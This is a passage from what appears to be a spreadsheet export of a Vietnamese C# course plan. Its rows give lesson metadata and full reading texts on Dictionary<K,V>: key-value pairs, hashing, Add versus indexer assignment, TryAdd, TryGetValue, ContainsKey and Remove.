Nhờ vào khả năng truy cập nhanh chóng bằng khóa, Dictionary&lt;K,V&gt; được ứng dụng rộng rãi trong nhiều tình huống thực tế:
Lưu trữ cấu hình ứng dụng: Ví dụ, bạn có thể lưu trữ các cài đặt như {"DatabaseConnection": "...", "LogLevel": "Debug"}.
Quản lý thông tin người dùng: Sử dụng ID người dùng làm khóa và đối tượng User làm giá trị.
// Dictionary&lt;int, User&gt; usersById;
// usersById.Add(101, new User { Id = 101, Name = "Alice" });
// User alice = usersById[101]; // Truy cập nhanh chóng
Hệ thống tra cứu (Look-up tables): Ví dụ, ánh xạ mã sản phẩm sang giá tiền, mã quốc gia sang tên quốc gia đầy đủ.
// Dictionary&lt;string, decimal&gt; productPrices;
// productPrices.Add("IPHONE15", 999.99M);
// decimal price = productPrices["IPHONE15"];
Bộ nhớ đệm (Caching): Lưu trữ tạm thời các kết quả tính toán hoặc truy vấn cơ sở dữ liệu để tăng tốc độ phản hồi cho các yêu cầu lặp lại.
Đếm tần suất: Đếm số lần xuất hiện của các từ trong một đoạn văn bản, sử dụng từ làm khóa và số lần xuất hiện làm giá trị.
Trong các bài học tiếp theo, bạn sẽ tìm hiểu chi tiết về cách khởi tạo, thêm, truy cập, cập nhật và xóa các phần tử trong Dictionary&lt;K,V&gt;, cùng với các phương thức hữu ích khác để làm việc với cấu trúc dữ liệu mạnh mẽ này.</t>
        </is>
      </c>
      <c r="W8" s="22" t="inlineStr">
        <is>
          <t># Giới thiệu Dictionary&lt;K,V&gt; và tầm quan trọng của Key-Value Pair
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích **cặp khóa - giá trị** (key-value pair) và vì sao khóa phải duy nhất.
- Khai báo và khởi tạo `Dictionary&lt;TKey, TValue&gt;` trong C#.
- So sánh tra cứu bằng `List&lt;T&gt;` (quét từng phần tử) với tra cứu bằng `Dictionary` (đi thẳng theo khóa).
- Chọn `List&lt;T&gt;` hay `Dictionary` tùy bài toán, và kể được vài tình huống dùng Dictionary.
- Dùng `TryGetValue` để tra một khóa có thể không tồn tại mà không gặp lỗi.
- Quan sát số lần so sánh của List và Dictionary khi tìm cùng một sinh viên bằng hoạt động mô phỏng.
## Bài toán: tìm theo mã
Giả sử bạn có danh sách sinh viên, mỗi người có một mã (`SV01`, `SV02`...) và một tên. Bạn cần tìm tên của sinh viên có mã `SV05`.
Nếu lưu trong `List&lt;Student&gt;`, bạn phải xét **từng thẻ từ đầu** cho tới khi gặp mã khớp. Danh sách càng dài, số lần so sánh càng nhiều. Khi nhu cầu là tìm theo một **định danh** (identifier) thay vì theo vị trí, `List&lt;T&gt;` không phải lựa chọn tối ưu. Đây là lúc `Dictionary` phát huy sức mạnh.
## Dictionary&lt;TKey, TValue&gt; là gì?
`Dictionary&lt;TKey, TValue&gt;` (từ điển) lưu dữ liệu dưới dạng các **cặp khóa - giá trị**. Hãy nghĩ đến một cuốn từ điển: bạn không tìm từ theo số trang, mà theo chính từ đó (khóa), và nhận về định nghĩa (giá trị).
- **Khóa** (key, kiểu `TKey`): nhãn dùng để tra cứu, ví dụ mã sinh viên `"SV05"`. Khóa phải **duy nhất**. Khóa có thể là chuỗi, số nguyên hoặc kiểu khác, miễn là tính được mã băm (hash code) của nó.
- **Giá trị** (value, kiểu `TValue`): dữ liệu đi kèm khóa, ví dụ tên `"Hà"`. Giá trị có thể trùng nhau.
Hãy hình dung một **tủ nhiều ngăn kéo**: mỗi ngăn dán một nhãn (khóa) và chứa một thứ bên trong (giá trị). Muốn lấy đồ, bạn nhìn nhãn rồi mở thẳng ngăn đó, không cần mở từng ngăn. Mỗi khóa trỏ tới đúng một giá trị.
Dictionary nằm trong `System.Collections.Generic`.
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var dict = new Dictionary&lt;string, string&gt;
        {
            ["SV01"] = "An",
            ["SV02"] = "Bình",
            ["SV05"] = "Hà"
        };
        string name = dict["SV05"];
        Console.WriteLine(name);   // Hà
    }
}
```
## Vì sao tra theo khóa nhanh?
Dictionary được xây dựng trên **bảng băm** (hash table). Khi bạn thêm một cặp:
1. Hệ thống tính một **mã băm** từ khóa.
2. Mã băm đó cho biết cặp được đặt ở ngăn nào.
Nhờ vậy, khi tra cứu, .NET tính lại mã băm và đi thẳng tới ngăn cần tìm. Thời gian tra trung bình gần như **không đổi** (ký hiệu O(1)), dù có 10 hay 1 triệu phần tử. Ngược lại, `List` tìm theo giá trị phải quét tuần tự, thời gian tăng theo số phần tử N (ký hiệu O(N)).
## List hay Dictionary?
| | `List&lt;T&gt;` | `Dictionary&lt;TKey, TValue&gt;` |
|---|---|---|
| Cấu trúc | Dãy phần tử có thứ tự, truy cập theo chỉ số 0, 1, 2... | Các cặp khóa - giá trị, không đảm bảo thứ tự |
| Cách tìm theo giá trị hoặc khóa | Quét từng phần tử từ đầu | Đi thẳng tới ngăn theo khóa |
| Phù hợp khi | Thứ tự quan trọng, truy cập theo vị trí, thêm xóa ở cuối | Mỗi phần tử có định danh duy nhất, cần tra nhanh, cần ánh xạ giá trị này sang giá trị khác |
Một vài tình huống thường dùng `Dictionary`:
- **Bảng tra cứu**: mã sản phẩm sang giá, mã quốc gia sang tên quốc gia.
- **Quản lý người dùng**: ID người dùng làm khóa, đối tượng người dùng làm giá trị.
- **Đếm tần suất**: mỗi từ là một khóa, số lần xuất hiện là giá trị.
- **Lưu cấu hình** và **bộ nhớ đệm** (cache) các kết quả đã tính.
## Tra khóa có thể không tồn tại
Đọc bằng `dict["SV09"]` khi khóa không có sẽ ném `KeyNotFoundException`. Cách an toàn là `TryGetValue`: trả về `bool` cho biết có tìm thấy không, và đưa giá trị ra qua tham số `out`.
```csharp
string name;
bool ok = dict.TryGetValue("SV09", out name);
// ok là false, name là null (giá trị mặc định của string), không có lỗi
```
Bài sau sẽ nói kỹ hơn về thêm, đọc và cập nhật phần tử trong Dictionary.
## Hoạt động: Quét từng thẻ hay đi thẳng tới ngăn
Mô phỏng dưới đây có hai cột cùng chứa sinh viên SV01 đến SV06 (An, Bình, Chi, Dũng, Hà, Khoa). Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Tìm SV05**. **Cột trái** là `List&lt;Student&gt;` gồm 6 thẻ, dùng `Find`. Con trỏ "xét" đi qua SV01, SV02, SV03, SV04, mỗi lần báo "khác" và bộ đếm "số lần so sánh" tăng. Đến SV05 thì khớp, tìm thấy Hà sau **5 lần so sánh**. **Cột phải** là `Dictionary&lt;string, string&gt;` dạng tủ 6 ngăn. Dòng `dict["SV05"]` đi thẳng tới ngăn SV05 (sáng lên, các ngăn khác mờ đi), lấy được Hà sau **1 lần tra**.
- Mở tab **Tìm SV09 (không có)**. Cột trái phải xét cả 6 thẻ, bộ đếm lên 6 (báo đỏ), rồi `Find` trả về `null` (thẻ cảnh báo vàng). Cột phải dùng `TryGetValue`: chỉ **1 lần tra**, thấy không có ngăn nào mang nhãn SV09, trả về `false` và `name` là `null`, không có lỗi.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/gioi-thieu-dictionary-k-v-va-tam-quan-trong-cua-key-value-pair/" title="Dictionary và cặp Key-Value" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi khóa là duy nhất và dẫn thẳng tới một giá trị, nên tra theo khóa chỉ cần một lần. List phải quét từng thẻ, và danh sách càng dài thì khoảng cách giữa hai cách càng lớn. Với khóa có thể không tồn tại, `TryGetValue` cho biết ngay mà không gây lỗi.
## Tóm tắt
- `Dictionary&lt;TKey, TValue&gt;` lưu các cặp **khóa - giá trị**. Khóa là nhãn tra cứu, giá trị là dữ liệu đi kèm.
- Mỗi khóa chỉ xuất hiện một lần. Giá trị có thể trùng.
- Dictionary dùng bảng băm nên tra theo khóa nhanh (trung bình O(1)), còn `List` phải quét từng phần tử (O(N)).
- Dùng `Dictionary` khi có định danh duy nhất và cần tra nhanh. Dùng `List` khi thứ tự và vị trí quan trọng.
- Đọc khóa không có bằng `[ ]` ném `KeyNotFoundException`. Dùng `TryGetValue` để tra an toàn.</t>
        </is>
      </c>
    </row>
    <row r="9" ht="409.6" customHeight="1" s="18">
      <c r="A9" s="10" t="n">
        <v>8</v>
      </c>
      <c r="B9" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C9" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Dictionary&lt;K,V&gt;</t>
        </is>
      </c>
      <c r="D9" s="10" t="inlineStr">
        <is>
          <t>Thêm, Truy cập và Cập nhật phần tử trong Dictionary&lt;K,V&gt;</t>
        </is>
      </c>
      <c r="E9" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F9" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G9" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H9" s="10" t="inlineStr">
        <is>
          <t>Phân biệt Add và gán bằng chỉ mục [key], và nhận ra hai lỗi hay gặp nhất.</t>
        </is>
      </c>
      <c r="I9" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab</t>
        </is>
      </c>
      <c r="J9" s="10" t="inlineStr">
        <is>
          <t>Tủ ngăn kéo: ngăn mới trượt vào (xanh), ngăn cập nhật nháy vàng, thẻ lỗi đỏ khi Add trùng khóa hoặc đọc khóa không có.</t>
        </is>
      </c>
      <c r="K9" s="10" t="inlineStr">
        <is>
          <t>H02, H03</t>
        </is>
      </c>
      <c r="L9" s="10" t="inlineStr">
        <is>
          <t>Add | Gán bằng [ ] | Add trùng khóa | Đọc khóa không có</t>
        </is>
      </c>
      <c r="M9" s="10" t="inlineStr">
        <is>
          <t>Add: stock.Add("thước", 3) → thêm ngăn mới, Count 3.
Gán: stock["vở"] = 8 → cập nhật ngăn có sẵn; stock["tẩy"] = 2 → khóa chưa có nên thêm mới.
Add trùng: stock.Add("bút", 7) → ArgumentException "An item with the same key has already been added. Key: bút".
Đọc khóa không có: int n = stock["kéo"] → KeyNotFoundException "The given key 'kéo' was not present in the dictionary."
Cách an toàn: stock.TryGetValue("kéo", out n) → false, n = 0, không lỗi.</t>
        </is>
      </c>
      <c r="N9" s="10" t="inlineStr">
        <is>
          <t>stock: bút = 10, vở = 5</t>
        </is>
      </c>
      <c r="O9" s="10" t="inlineStr">
        <is>
          <t>Add chỉ để thêm (trùng khóa là lỗi); [key] = value vừa thêm vừa cập nhật; đọc an toàn bằng TryGetValue.</t>
        </is>
      </c>
      <c r="P9" s="10" t="inlineStr">
        <is>
          <t>Thông điệp lỗi theo .NET hiện đại (.NET Core/.NET 5+).</t>
        </is>
      </c>
      <c r="Q9" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/them-truy-cap-va-cap-nhat-phan-tu-trong-dictionary-k-v/index.html</t>
        </is>
      </c>
      <c r="R9" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/them-truy-cap-va-cap-nhat-phan-tu-trong-dictionary-k-v/</t>
        </is>
      </c>
      <c r="S9" s="10" t="n"/>
      <c r="T9" s="12" t="n"/>
      <c r="U9" s="12" t="n"/>
      <c r="V9" s="21" t="inlineStr">
        <is>
          <t>Để tận dụng tối đa sức mạnh của Dictionary&lt;K,V&gt;, bạn cần nắm vững các thao tác cơ bản để thêm, truy cập và cập nhật các cặp khóa-giá trị. Trang này sẽ hướng dẫn bạn chi tiết về các phương thức và cú pháp phổ biến nhất cho những tác vụ này.
Thêm cặp khóa-giá trị mới bằng phương thức Add()
Phương thức Add() là cách trực tiếp nhất để thêm một cặp khóa-giá trị vào Dictionary&lt;K,V&gt;. Bạn cung cấp khóa và giá trị tương ứng làm đối số cho phương thức này.
Cú pháp cơ bản:
myDictionary.Add(key, value);
Lưu ý quan trọng: Mỗi khóa trong Dictionary phải là duy nhất. Nếu bạn cố gắng thêm một cặp khóa-giá trị với một khóa đã tồn tại, phương thức Add() sẽ ném ra một ngoại lệ ArgumentException.
Ví dụ:
Giả sử chúng ta có một Dictionary lưu trữ tên các quốc gia và thủ đô của chúng.
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        // Khởi tạo một Dictionary với khóa là string (tên quốc gia)
        // và giá trị là string (tên thủ đô)
        Dictionary&lt;string, string&gt; capitals = new Dictionary&lt;string, string&gt;();
        // Thêm các cặp khóa-giá trị mới
        capitals.Add("Vietnam", "Hanoi");
        capitals.Add("USA", "Washington D.C.");
        capitals.Add("France", "Paris");
        Console.WriteLine("Các thủ đô đã được thêm:");
        foreach (var entry in capitals)
        {
            Console.WriteLine($"- {entry.Key}: {entry.Value}");
        }
        // Thử thêm một khóa đã tồn tại (sẽ gây lỗi)
        try
        {
            capitals.Add("Vietnam", "Ho Chi Minh City"); // Lỗi: Khóa 'Vietnam' đã tồn tại
        }
        catch (ArgumentException ex)
        {
            Console.WriteLine($"\nLỗi khi thêm: {ex.Message}");
        }
    }
}
Kết quả:
Các thủ đô đã được thêm:
- Vietnam: Hanoi
- USA: Washington D.C.
- France: Paris
Lỗi khi thêm: An item with the same key has already been added. Key: Vietnam
Truy cập giá trị bằng khóa (Indexer)
Cách phổ biến và trực quan nhất để truy cập giá trị liên kết với một khóa cụ thể trong Dictionary là sử dụng cú pháp indexer (giống như truy cập phần tử trong mảng hoặc List bằng chỉ mục, nhưng ở đây là bằng khóa).
Cú pháp cơ bản:
ValueType myValue = myDictionary[key];
Lưu ý quan trọng: Nếu bạn cố gắng truy cập một khóa không tồn tại trong Dictionary, indexer sẽ ném ra một ngoại lệ KeyNotFoundException.
Ví dụ:
Tiếp tục với Dictionary về thủ đô:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, string&gt; capitals = new Dictionary&lt;string, string&gt;
        {
            {"Vietnam", "Hanoi"},
            {"USA", "Washington D.C."},
            {"France", "Paris"}
        };
        // Truy cập giá trị bằng khóa
        string vietnamCapital = capitals["Vietnam"];
        Console.WriteLine($"Thủ đô của Vietnam là: {vietnamCapital}");
        string usaCapital = capitals["USA"];
        Console.WriteLine($"Thủ đô của USA là: {usaCapital}");
        // Thử truy cập một khóa không tồn tại (sẽ gây lỗi)
        try
        {
            string germanyCapital = capitals["Germany"]; // Lỗi: Khóa 'Germany' không tồn tại
        }
        catch (KeyNotFoundException ex)
        {
            Console.WriteLine($"\nLỗi khi truy cập: {ex.Message}");
        }
    }
}
Kết quả:
Thủ đô của Vietnam là: Hanoi
Thủ đô của USA là: Washington D.C.
Lỗi khi truy cập: The given key 'Germany' was not present in the dictionary.
Để truy cập giá trị một cách an toàn hơn mà không lo lỗi khi khóa không tồn tại, bạn có thể sử dụng phương thức TryGetValue() hoặc ContainsKey() trước khi truy cập, như đã được đề cập trong bài học "Kiểm tra sự tồn tại và Xóa phần tử trong Dictionary&lt;K,V&gt;".
Cập nhật giá trị của một khóa đã tồn tại
Bạn cũng sử dụng cú pháp indexer để cập nhật giá trị liên kết với một khóa đã tồn tại. Khi bạn gán một giá trị mới cho myDictionary[key] và khóa đó đã có sẵn trong Dictionary, giá trị cũ sẽ được thay thế bằng giá trị mới.
Lưu ý thú vị: Nếu khóa bạn dùng để gán giá trị mới chưa tồn tại, indexer sẽ tự động thêm khóa đó cùng với giá trị mới vào Dictionary. Điều này khác biệt với phương thức Add() (sẽ gây lỗi nếu khóa đã tồn tại).
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; studentScores = new Dictionary&lt;string, int&gt;
        {
            {"Alice", 85},
            {"Bob", 90},
            {"Charlie", 78}
        };
        Console.WriteLine("Điểm ban đầu:");
        foreach (var entry in studentScores)
        {
            Console.WriteLine($"- {entry.Key}: {entry.Value}");
        }
        // Cập nhật điểm cho Bob
        studentScores["Bob"] = 92;
        Console.WriteLine("\nĐiểm của Bob sau khi cập nhật: " + studentScores["Bob"]);
        // Thêm một sinh viên mới bằng indexer (nếu khóa chưa tồn tại)
        studentScores["David"] = 88;
        Console.WriteLine("Điểm của David (mới thêm): " + studentScores["David"]);
        Console.WriteLine("\nĐiểm sau khi cập nhật và thêm:");
        foreach (var entry in studentScores)
        {
            Console.WriteLine($"- {entry.Key}: {entry.Value}");
        }
    }
}
Kết quả:
Điểm ban đầu:
- Alice: 85
- Bob: 90
- Charlie: 78
Điểm của Bob sau khi cập nhật: 92
Điểm của David (mới thêm): 88
Điểm sau khi cập nhật và thêm:
- Alice: 85
- Bob: 92
- Charlie: 78
- David: 88
Nếu bạn chỉ muốn cập nhật một khóa chắc chắn đã tồn tại và không muốn thêm mới nếu khóa không có, bạn có thể kiểm tra sự tồn tại của khóa trước khi gán, ví dụ: if (studentScores.ContainsKey("Eve")) { studentScores["Eve"] = 95; }.
Thêm an toàn bằng phương thức TryAdd()
Trong .NET Core 2.0 trở lên (và .NET 5+), phương thức TryAdd() được giới thiệu để cung cấp một cách an toàn hơn để thêm các cặp khóa-giá trị. Thay vì ném ngoại lệ khi khóa đã tồn tại, TryAdd() sẽ trả về false.
Cú pháp cơ bản:
bool wasAdded = myDictionary.TryAdd(key, value);
Ưu điểm:TryAdd() giúp bạn tránh được khối try-catch khi bạn không chắc chắn về sự tồn tại của khóa và muốn thêm nó chỉ khi nó chưa có.
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, string&gt; users = new Dictionary&lt;string, string&gt;();
        // Thêm người dùng mới thành công
        bool added1 = users.TryAdd("john.doe", "password123");
        Console.WriteLine($"Đã thêm 'john.doe': {added1}"); // True
        // Thêm người dùng khác thành công
        bool added2 = users.TryAdd("jane.smith", "securepass");
        Console.WriteLine($"Đã thêm 'jane.smith': {added2}"); // True
        // Thử thêm một người dùng với khóa đã tồn tại
        bool added3 = users.TryAdd("john.doe", "newpassword");
        Console.WriteLine($"Đã thêm 'john.doe' lần nữa: {added3}"); // False (không thêm, không lỗi)
        Console.WriteLine("\nDanh sách người dùng hiện tại:");
        foreach (var user in users)
        {
            Console.WriteLine($"- {user.Key}");
        }
    }
}
Kết quả:
Đã thêm 'john.doe': True
Đã thêm 'jane.smith': True
Đã thêm 'john.doe' lần nữa: False
Danh sách người dùng hiện tại:
- john.doe
- jane.smith
Như bạn thấy, TryAdd() trả về false khi khóa "john.doe" đã tồn tại, cho phép bạn xử lý logic mà không làm chương trình bị dừng bởi ngoại lệ. Đây là một phương thức rất hữu ích để kiểm soát luồng chương trình một cách linh hoạt hơn khi thao tác với Dictionary.</t>
        </is>
      </c>
      <c r="W9" s="22" t="inlineStr">
        <is>
          <t># Thêm, Truy cập và Cập nhật phần tử trong Dictionary&lt;K,V&gt;
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Thêm cặp khóa - giá trị bằng `Add` và bằng chỉ mục `[khóa] = giá trị`.
- Phân biệt `Add` (lỗi khi trùng khóa) với gán bằng `[ ]` (cập nhật nếu có, thêm mới nếu chưa có).
- Đọc giá trị theo khóa và nhận ra `KeyNotFoundException` khi khóa không tồn tại.
- Dùng `TryGetValue`, `ContainsKey` và `TryAdd` để làm việc an toàn, không cần `try-catch`.
- Duyệt Dictionary bằng `foreach` qua `Key` và `Value`.
- Quan sát các ngăn kéo thay đổi và các thẻ lỗi bằng hoạt động mô phỏng.
## Khởi tạo Dictionary
Ví dụ trong bài là kho hàng `stock`: khóa là tên hàng (`string`), giá trị là số lượng (`int`).
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var empty = new Dictionary&lt;string, int&gt;();        // rỗng
        Console.WriteLine(empty.Count);                   // 0
        var stock = new Dictionary&lt;string, int&gt;
        {
            ["bút"] = 10,
            ["vở"] = 5
        };
        Console.WriteLine(stock.Count);                   // 2
    }
}
```
`Count` cho biết số cặp khóa - giá trị đang có.
## Thêm phần tử
### Add: chỉ để thêm khóa mới
```csharp
var stock = new Dictionary&lt;string, int&gt;();
stock.Add("bút", 10);
stock.Add("vở", 5);
stock.Add("thước", 3);   // Count = 3
```
Mỗi khóa phải duy nhất. Nếu khóa **đã có**, `Add` ném `ArgumentException` (không tự ghi đè):
```csharp
stock.Add("bút", 7);
// Lỗi: System.ArgumentException
// An item with the same key has already been added. Key: bút
```
### Gán bằng [ ]: cập nhật hoặc thêm mới
```csharp
stock["vở"] = 8;    // "vở" đã có: cập nhật 5 thành 8, Count không đổi
stock["tẩy"] = 2;   // "tẩy" chưa có: thêm ngăn mới, Count tăng
```
Cùng một cú pháp: **có khóa thì cập nhật, chưa có thì thêm**, không báo lỗi. Vì thế muốn ghi đè một khóa đã có, hãy gán bằng `[ ]` thay cho `Add`. Nếu bạn chỉ muốn cập nhật khi khóa chắc chắn đã tồn tại, hãy kiểm tra `ContainsKey` trước khi gán.
| Cách viết | Khóa đã có | Khóa chưa có |
|---|---|---|
| `Add(khóa, giá trị)` | Ném `ArgumentException` | Thêm mới |
| `d[khóa] = giá trị` | Cập nhật giá trị | Thêm mới |
| `TryAdd(khóa, giá trị)` | Trả về `false`, không đổi gì | Thêm mới, trả về `true` |
### TryAdd: thêm an toàn
`TryAdd` (có từ .NET Core 2.0, dùng được trong .NET 8) chỉ thêm khi khóa chưa có và trả về `bool`. Nó giúp tránh `try-catch` khi bạn không chắc khóa đã tồn tại:
```csharp
var stock = new Dictionary&lt;string, int&gt; { ["bút"] = 10 };
bool a = stock.TryAdd("vở", 5);    // true: đã thêm
bool b = stock.TryAdd("bút", 7);   // false: "bút" đã có, giá trị vẫn là 10
Console.WriteLine($"{a} {b}");     // True False
```
## Truy cập phần tử
Đọc giá trị bằng `d[khóa]`:
```csharp
int n = stock["bút"];   // 10
```
Nếu khóa **không có**, Dictionary ném `KeyNotFoundException`:
```csharp
int m = stock["kéo"];
// Lỗi: System.Collections.Generic.KeyNotFoundException
// The given key 'kéo' was not present in the dictionary.
```
Với khóa có thể không tồn tại, hãy đọc an toàn bằng `TryGetValue`:
```csharp
int count;
bool ok = stock.TryGetValue("kéo", out count);
// ok là false, count là 0 (giá trị mặc định của int), không có lỗi
if (ok)
{
    Console.WriteLine($"Còn {count} cái kéo");
}
```
Hãy kiểm tra `ok` trước khi dùng `count`. Cũng có thể gọi `stock.ContainsKey("kéo")` để biết khóa có tồn tại hay không.
## Duyệt Dictionary
Mỗi phần tử khi duyệt là một cặp `KeyValuePair`, có thuộc tính `Key` và `Value`:
```csharp
var stock = new Dictionary&lt;string, int&gt; { ["bút"] = 10, ["vở"] = 5 };
foreach (var entry in stock)
{
    Console.WriteLine($"{entry.Key}: {entry.Value}");
}
// bút: 10
// vở: 5
```
Dictionary không cam kết thứ tự duyệt. Đừng dựa vào thứ tự các cặp khi viết chương trình.
## Hoạt động: Các ngăn kéo thay đổi
Mô phỏng dưới đây có bốn tab, mỗi tab là một tình huống với `stock`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Add**. Tủ bắt đầu rỗng. Ba lần `Add("bút", 10)`, `Add("vở", 5)`, `Add("thước", 3)` thêm lần lượt ba ngăn mới (màu xanh), và `Count` tăng từ 1 đến 3.
- Mở tab **Gán bằng [ ]**. Tủ có hai ngăn: "bút" chứa 10 và "vở" chứa 5. `stock["vở"] = 8` cập nhật ngăn "vở" từ 5 thành 8, `Count` vẫn là 2. `stock["tẩy"] = 2` thêm ngăn mới "tẩy" nên `Count` lên 3.
- Mở tab **Add trùng khóa**. Dòng `stock.Add("bút", 7)` tìm thấy ngăn "bút" đang chứa 10 và ngăn đó chuyển sang màu đỏ. Thẻ lỗi **ArgumentException** hiện ra với thông báo "An item with the same key has already been added. Key: bút". Ngăn "bút" vẫn chứa 10. Thẻ gợi ý cuối nhắc dùng `stock["bút"] = 7` nếu muốn ghi đè.
- Mở tab **Đọc khóa không có**. Tủ có "bút" và "vở", không có ngăn "kéo". `stock["kéo"]` làm hiện thẻ lỗi **KeyNotFoundException** với thông báo "The given key 'kéo' was not present in the dictionary.". Bước tiếp theo, `TryGetValue("kéo", out m)` trả về `false` và `m` là 0, thẻ xanh cho biết không có lỗi.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/them-truy-cap-va-cap-nhat-phan-tu-trong-dictionary-k-v/" title="Thêm, truy cập và cập nhật trong Dictionary" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi khóa chỉ có một ngăn. `Add` chỉ dùng để thêm khóa mới và báo lỗi khi trùng, còn gán bằng `[ ]` vừa cập nhật vừa thêm mới. Đọc bằng `[ ]` với khóa không có sẽ gây lỗi, nên dùng `TryGetValue` khi chưa chắc khóa tồn tại.
## Tóm tắt
- `Add(khóa, giá trị)` thêm khóa mới. Trùng khóa thì ném `ArgumentException`.
- `d[khóa] = giá trị` cập nhật nếu khóa có sẵn, thêm mới nếu chưa có, không báo lỗi.
- `TryAdd` chỉ thêm khi khóa chưa có, trả về `false` thay vì ném lỗi.
- `d[khóa]` đọc giá trị. Khóa không có thì ném `KeyNotFoundException`.
- `TryGetValue(khóa, out giá_trị)` trả về `bool`, không ném lỗi, và gán giá trị mặc định khi không thấy. `ContainsKey` kiểm tra khóa có tồn tại.
- `foreach` duyệt từng `KeyValuePair` qua `Key` và `Value`, thứ tự không được đảm bảo.</t>
        </is>
      </c>
    </row>
    <row r="10" ht="409.6" customHeight="1" s="18">
      <c r="A10" s="10" t="n">
        <v>9</v>
      </c>
      <c r="B10" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C10" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Dictionary&lt;K,V&gt;</t>
        </is>
      </c>
      <c r="D10" s="10" t="inlineStr">
        <is>
          <t>Kiểm tra sự tồn tại và Xóa phần tử trong Dictionary&lt;K,V&gt;</t>
        </is>
      </c>
      <c r="E10" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F10" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G10" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H10" s="10" t="inlineStr">
        <is>
          <t>Dùng đúng ContainsKey, ContainsValue và Remove; thấy kiểm tra giá trị chậm hơn kiểm tra khóa.</t>
        </is>
      </c>
      <c r="I10" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J10" s="10" t="inlineStr">
        <is>
          <t>Tủ ngăn kéo: ContainsKey đi thẳng tới ngăn; ContainsValue mở lần lượt từng ngăn; ngăn bị Remove mờ đỏ rồi biến mất.</t>
        </is>
      </c>
      <c r="K10" s="10" t="inlineStr">
        <is>
          <t>H02</t>
        </is>
      </c>
      <c r="L10" s="10" t="inlineStr">
        <is>
          <t>ContainsKey | ContainsValue | Remove</t>
        </is>
      </c>
      <c r="M10" s="10" t="inlineStr">
        <is>
          <t>ContainsKey("vở") → true sau 1 lần tra; ContainsKey("kéo") → false.
ContainsValue(5) → mở lần lượt từng ngăn đến khi gặp giá trị 5 (đếm số ngăn đã mở).
Remove("bút") → true, Count giảm; Remove("kéo") → false, không lỗi.
Remove("vở", out int old) → lấy luôn giá trị vừa xóa (old = 5).</t>
        </is>
      </c>
      <c r="N10" s="10" t="inlineStr">
        <is>
          <t>stock: bút = 10, vở = 5, thước = 3</t>
        </is>
      </c>
      <c r="O10" s="10" t="inlineStr">
        <is>
          <t>Kiểm tra khóa nhanh, kiểm tra giá trị phải duyệt; Remove khóa không có chỉ trả false.</t>
        </is>
      </c>
      <c r="P10" s="10" t="inlineStr">
        <is>
          <t>Remove(key, out value) có từ .NET Core 2.0.</t>
        </is>
      </c>
      <c r="Q10" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/kiem-tra-su-ton-tai-va-xoa-phan-tu-trong-dictionary-k-v/index.html</t>
        </is>
      </c>
      <c r="R10" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/kiem-tra-su-ton-tai-va-xoa-phan-tu-trong-dictionary-k-v/</t>
        </is>
      </c>
      <c r="S10" s="10" t="n"/>
      <c r="T10" s="12" t="n"/>
      <c r="U10" s="12" t="n"/>
      <c r="V10" s="21" t="inlineStr">
        <is>
          <t>Kiểm tra sự Tồn tại của Khóa và Giá trị
Trong quá trình làm việc với Dictionary&lt;K,V&gt;, không phải lúc nào bạn cũng biết chắc chắn liệu một khóa hoặc một giá trị cụ thể có tồn tại trong bộ sưu tập hay không. Việc cố gắng truy cập một khóa không tồn tại bằng cách sử dụng toán tử [] sẽ gây ra lỗi KeyNotFoundException, làm gián đoạn chương trình của bạn. Để tránh những tình huống này và giúp bạn quản lý dữ liệu một cách linh hoạt, C# cung cấp các phương thức hiệu quả để kiểm tra sự tồn tại và xóa các phần tử.
Phương thức ContainsKey()
